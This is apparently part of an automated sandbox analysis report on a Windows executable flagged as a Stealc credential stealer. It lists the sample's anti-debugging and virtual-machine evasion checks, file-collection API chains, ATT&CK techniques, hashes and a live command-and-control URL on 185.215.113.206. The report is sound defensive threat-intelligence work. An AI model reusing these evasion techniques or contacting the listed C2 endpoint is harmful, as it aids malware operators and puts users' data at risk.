                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A115 second address: A3A144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBD38D4D516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FBD38D4D529h 0x00000012 jmp 00007FBD38D4D521h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jng 00007FBD38D4D516h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A144 second address: A3A148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A2A3 second address: A3A2A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BDDF second address: A3BDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BDE4 second address: A3BDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD38D4D51Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BDF8 second address: A3BDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BDFC second address: A3BE00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E6F3 second address: A3E6F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E6F9 second address: A3E6FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3EBFF second address: A3EC89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A98Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jmp 00007FBD3853A98Ch 0x00000010 pop eax 0x00000011 nop 0x00000012 mov edx, dword ptr [ebp+122D2A39h] 0x00000018 push dword ptr [ebp+122D1AA4h] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007FBD3853A988h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 call 00007FBD3853A989h 0x0000003d jmp 00007FBD3853A98Eh 0x00000042 push eax 0x00000043 push edi 0x00000044 jmp 00007FBD3853A98Ch 0x00000049 pop edi 0x0000004a mov eax, dword ptr [esp+04h] 0x0000004e jp 00007FBD3853A98Eh 0x00000054 jc 00007FBD3853A988h 0x0000005a push eax 0x0000005b pop eax 0x0000005c mov eax, dword ptr [eax] 0x0000005e push esi 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 pop eax 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FF10 second address: A3FF42 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBD38D4D516h 0x00000008 jmp 00007FBD38D4D521h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBD38D4D525h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FF42 second address: A3FF4C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBD3853A986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FF4C second address: A3FF5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jg 00007FBD38D4D51Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41827 second address: A4182C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4392E second address: A43932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43932 second address: A4393C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4393C second address: A43940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50804E4 second address: 50804EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50804EA second address: 50804EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50804EE second address: 50804F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50804F2 second address: 5080511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBD38D4D524h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080511 second address: 5080523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3853A98Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080523 second address: 5080527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080527 second address: 5080560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FBD3853A997h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBD3853A995h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080560 second address: 5080566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080601 second address: 5080626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, FAh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBD3853A996h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080626 second address: 5080635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F56D second address: 95F571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7ADC42 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 976761 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9E3CA3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision | graph_0-37509
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_004D40F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004CE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_004CE530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_004C1710
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_004D47C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004CF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_004CF7B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_004D4B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_004D3B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004CDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_004CDB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004CBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_004CBE40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004CEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_004CEE20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004CDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_004CDF10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C1160 GetSystemInfo,ExitProcess | 0_2_004C1160
Source: file.exe, file.exe, 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwaref7 K
Source: file.exe, 00000000.00000002.1731343295.00000000012D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
Source: file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1731343295.000000000130B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731343295.0000000001305000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36324
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36321
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36341
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36376
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36336
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36210
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C4610 VirtualProtect ?,00000004,00000100,00000000 | 0_2_004C4610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_004D9BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D9AA0 mov eax, dword ptr fs:[00000030h] | 0_2_004D9AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA | 0_2_004D7690
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7280, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_004D9790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle | 0_2_004D98E0
Source: file.exe, file.exe, 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: &aProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00507588 cpuid | 0_2_00507588
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_004D7D20
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_004D7B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_004D79E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004D7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_004D7BC0

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1688123808.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7280, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1688123808.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7280, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 334 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php | true | | unknown
http://185.215.113.206/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php=DMJ | file.exe, 00000000.00000002.1731343295.000000000130B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/6c4adf523b719729.php/O | file.exe, 00000000.00000002.1731343295.00000000012E7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/$ | file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1543430
Start date and time: 2024-10-27 21:05:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 133
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                            No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | wo4POc0NG1.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.206/
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/e2b1563c6670f193.php
                            No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | wo4POc0NG1.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | r9gBM4l6Ip.exe | Get hash | malicious | Amadey | Browse | 185.215.113.43
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.961614431109437
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:2'137'600 bytes
                            MD5:7e247ce0bfb04ead4760a9bd841ece58
                            SHA1:41708946a0ab26f707350236bc2f0455e1381cc7
                            SHA256:bcc2e1473d790771507934707e46e5bd0a710141fe776d5b37d14d5aeda8f82a
                            SHA512:29ae8c5166237f74212a53e7b3cc1715f021627ae968f778573287b2ce5c79bc906a26740a1bda1dc4f89a5a2715c375cb6b1a077f0983d7847b1ef9f850c0de
                            SSDEEP:49152:QrJ3AJ2Ce09k45G0s/n63nEstp0yfXwifOepPUdzq:UrTEHr3nE60KwimcUdW
                            TLSH:E1A5330B568045B8D02F8977AC0BCBFA1BDD61EAE06A9F06870DC7469B1FB3F4561583
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0xb2d000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007FBD38B1DB5Ah
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
